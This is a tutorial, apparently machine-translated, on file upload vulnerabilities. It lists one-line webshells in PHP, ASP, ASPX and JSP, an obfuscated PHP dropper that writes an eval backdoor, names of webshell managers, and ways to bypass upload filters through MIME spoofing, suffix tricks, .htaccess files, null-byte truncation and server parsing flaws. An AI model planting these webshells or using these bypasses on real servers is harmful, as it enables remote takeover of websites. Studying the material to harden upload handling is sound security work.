[Network Security] Detailed Explanation of File Upload Vulnerabilities

File Upload Vulnerability

1. What is file upload

Encapsulate the client data in the form of a file and send it to the server through the network protocol. The data is parsed on the server side, and finally saved as a real file on the server hard disk.

Usually, when a file is uploaded with the HTTP protocol, a POST request is sent to the web server. After the web server receives the request and agrees, the user will establish a connection with the web server and transmit data.

2. The reason for the vulnerability in file upload

server misconfiguration

File upload restrictions are bypassed and filtering is lax

File Upload Vulnerability in Open Source Editors

File parsing vulnerability leads to file execution

3. File upload vulnerability hazards

Attackers upload malicious files and pass them to the interpreter for execution, and then execute malicious codes on the server, perform malicious operations such as database execution, server file management, and command execution, thereby controlling the entire website and server.

This malicious file is also known as WebShell.

Potentially Vulnerable Locations

Image upload function

Avatar upload function

Document upload function

4.webshell

learn

webshell is a command execution environment in the form of web pages such as asp, jsp, or cgi, and can also be called a web page Trojan horse backdoor.

Attackers can use this webpage backdoor to obtain the operation authority of the website server, control the website server to upload and download files, view the database, execute commands, etc.

back door

There are 65535 ports on a computer. Each port is a door opened by the computer to connect with the outside world. Each door has some services provided by the computer. Attackers use these services to obtain the authority of the server and leave behind a back door.

Classification

1. Classified by file size:

   One-sentence Trojan horse: usually only one line of code

   Pony: only includes file upload function

   Malaysia: Contains many functions, and the code is usually encrypted and hidden

2. Classified by script type

   jsp

   asp

   aspx

   php

features

1. Most webshells appear in the form of dynamic scripts
2. webshell is an asp or php Trojan backdoor
3. The webshell can pass through the server firewall, and the data exchanged between the attacker and the controlled server is transmitted through port 80
4. Generally, the webshell will not leave records in the system log, but will only leave data transfer records in the web log.

attack process

1. Use web vulnerabilities to obtain web permissions
2. upload pony
3. Upload Malaysia
4. Remotely invoke webshell to execute commands

Common webshells

PHP

<?php eval($_GET[pass]);?> <?php eval($_POST[pass]);?>

pass is a parameter, which needs to be echoed in the URL after opening the Trojan

http.../?pass = phpinfo(); or system(ipconfig); and other commands

ASP

<%eval request(“pass”)%>

ASPX

<%@ Page Language=“Jscript”%><%eval(Request.Item[“pass”])%>

JSP

<%Runtime.getRuntime().exec(request.getParameter(“i”)));%>

5. The basic principle of webshell

1. Executable script

​ HTTP packet

2. Data transfer

3. Execute the passed data

​ direct execution

​ file contains the implementation

​ Dynamic function execution

​ callback function

one word pony

<?php fputs(fopen("up.php","w"),'<?php eval($_POST["cmd"])?>');?>

Create an up.php file in the current directory, and the content of the file is PHP code

upload malaysia via pony

Use the base64 tool to convert the PHP code into a string (requires secondary encoding to remove special characters such as +=)

Create up.php, write the file upload PHP code into up.php

<?php fputs(fopen(base64_decode(dXAucGhw),w),base64_decode(base64_decode(PHP code encoding)));?>

base64_decode() does decoding processing dXAucGhw is the encoding processing of up.php.

After that, it can be imported into Malaysia through the file upload function.

6. webshell management tool

1. Chinese kitchen knife (caidao) (relatively backward, with a back door)

2.c knife (cknife)

3.Weevely3 (included in kali)

4. Chinese Ant Sword (AntSword)

5. Ice Scorpion (Behinder)

The data transmission will be encrypted, which can bypass the firewall very well.

7. File upload detection method

Client-side JavaScript detection ( detection of file extensions ) (front-end detection)

Server-side MIME type detection ( detection of content-type content )

MIME Reference Manual (w3school.com.cn)

Server-side directory path detection ( detection of content related to the root path parameter )

Server-side file extension detection ( detection of content related to file extension )

Server-side file content detection ( check whether the content is legal, whether it contains malicious code, etc. )

8. Bypass method

Use the burpsuite tool to capture packets, and then modify the file to meet the server detection form.

Bypass client-side detection (front-end JavaScript detection)

Principle of client detection:

Usually, the upload page contains JavaScript code that specifically detects file uploads, and the most common one is to detect whether the file type and extension are legal.

---

method:

Just disable JS in the local browser client.

It can be realized by using the NoScript plug-in of Firefox browser, disabling JS in IE, etc.

---

Bypass server detection

Principle of server detection:

Server-side code typically checks for three points:

MIME type, file suffix, file content

[External link image transfer failed, the source site may have an anti-leeching mechanism, it is recommended to save the image and upload it directly (img-afZHgJBZ-1677413271759) (C:\Users\wrz\AppData\Roaming\Typora\typora-user-images\ image-20230226183230079.png)]

File magic number : The first few bytes in the file can identify what type of file the file is.

The magic number of the file format File Format and Magic Number

Use the WinHex tool to view the magic number of the corresponding file.

---

Bypass method:

1. Bypass MIME type detection

principle:

Detect the value of the Content-Type field of the http packet during the upload process of image type files to determine whether the uploaded file is legal.

method:

Use burpsuite to intercept and modify the content-type type of the packet file to bypass.

---

2. Bypass file suffix detection - blacklist

Principle (blacklist strategy):

File extensions are illegal in the blacklist. Generally, there is a special blacklist, which contains common dangerous script files.

method:

1. Suffix Case Bypass (.pHp)

   In the judgment of the suffix, if you only compare the strings separately to judge whether it is a restricted file, you can use the case of the suffix name to bypass.

2. Space bypass (.php)

   If the blacklist does not empty the suffix name

   It can be bypassed by adding a space after the suffix name.

3. dot bypass (.php.)

   If the blacklist does not de-dot the suffix name

   Using the file name feature of the Windows system, the last dot of the suffix will be automatically removed, and the file name suffix can be bypassed by adding a dot.

4. ::$DATA bypass

   If the blacklist is not done go::$DATA processing

   Using a feature of the NTFS file system under Windows, you can add ::$DATA after the suffix name to bypass the blacklist detection.

   Windows will automatically filter ::$DATA.

5. Cooperate with Apache to resolve vulnerabilities

   Apache parsing has a feature:

   The parsing file is judged from right to left, and if the parsing is unrecognizable, then judge to the left.

   Such as aa.php.owf.rar file, Apache does not recognize and parse rar and owf, it will be parsed into php file.

6. .htaccess file (distributed configuration file)

   Cooperate with list bypass, upload a custom .htaccess, you can easily bypass various detections.

   The .htaccess file is called Hypertext Access (Hypertext Access).

   Provides methods for changing the configuration for a directory.

   When the file is uploaded to the server, the server will find the .htaccess file to read and parse the configuration.

   This configuration can be customized to make files bypass detection.

---

3. Bypass file suffix detection - white list

Principle (whitelist strategy):

File extensions that are not in the whitelist are illegal.

Bypass method:

The server judges the file type from the back to the front, and parses the file from the front to the back.

It can be bypassed by 00 truncation, including %00 truncation and 0X00 truncation.

Example: Upload a file named aa.php%00.png

The server judges the file type from the back to the front. When the server reads %00, it will parse it into 0X00. When there is 0X00, it will automatically ignore the content after 0X00.

Then this file will be uploaded as a png file, bypassing the whitelist.

When the server saves the file, it parses from front to back, automatically ignores .png, and saves it as a php file.

Note :

In the url, it becomes aa.php%00.png. In the file extension, %00 needs to be decoded and then added to the file extension.

Use the burpsuite tool to add, first add a space where %00 needs to be added, and then check the HEX position, the HEX of the space is 20, change this position to 00, which is the decoding of %00.

---

4. Bypass file content detection

principle:

Generally, it is judged whether the uploaded file is legal by detecting the content of the file.

Two detection methods:

By detecting the file magic number.

Call the API or function to load test the file. The common one is image rendering test (maybe secondary rendering test).

Bypass method:

1. Bypass file magic number detection

​ Add the corresponding file magic number at the beginning of the file.

​ For example: to bypass the magic number detection of jpg files, add FF D8 FF E0 10 4A 46 49 46

2. Bypass file loading detection

Render/Load Test Attacks - Code Injection Bypass

​Attack principle:

​ Find a blank space to fill in the code without destroying the rendering of the file itself

​ Generally, it is the comment area of ​​the picture, which can ensure the integrity of the file structure.

Attack method on secondary rendering ----- attack file loader itself

​Attack principle:

​ Attack the file loader through an overflow attack,

​ After uploading malicious files, the file loader on the server will actively test, and the overflow attack executes shellcode during the loading test.

9. Web parsing vulnerability

Apache Parsing Vulnerability

The parsing file is judged from right to left, and if the parsing is unrecognizable, then judge to the left.

Such as aa.php.owf.rar file, Apache does not recognize and parse rar and owf, it will be parsed into php file.

IIS6.0 parsing vulnerability

1. Directory analysis

Form: www.xxx.com/xx.asp/xx.jpg

Principle : The server will parse all the files in the .asp directory into asp files by default.

2. File analysis

Format: www.xxx.com/xx.asp;.jpg

Principle : The server does not parse the content after the semicolon by default, so xx.asp;jpg is parsed into an asp file

IIS7.0 parsing vulnerability

Format: any file name/any file name.php

**Principle: **IIS7.0/7.5 has a parsing vulnerability similar to Nginx when parsing php.

For any file name, as long as the string "/any file name.php" is appended after the URL, it will be parsed in the way of PHP

Nginx parsing vulnerability

Form 1: Arbitrary file name/arbitrary file name.php

**Principle:**Add "/any file name.php" to any file name and it will be parsed according to php, such as test.jpg/x.php

Form 2: Any file name%00.php

For the lower version of Nginx, %00.php can be added after any file name for parsing attack

(Nginx version <=0.8.37)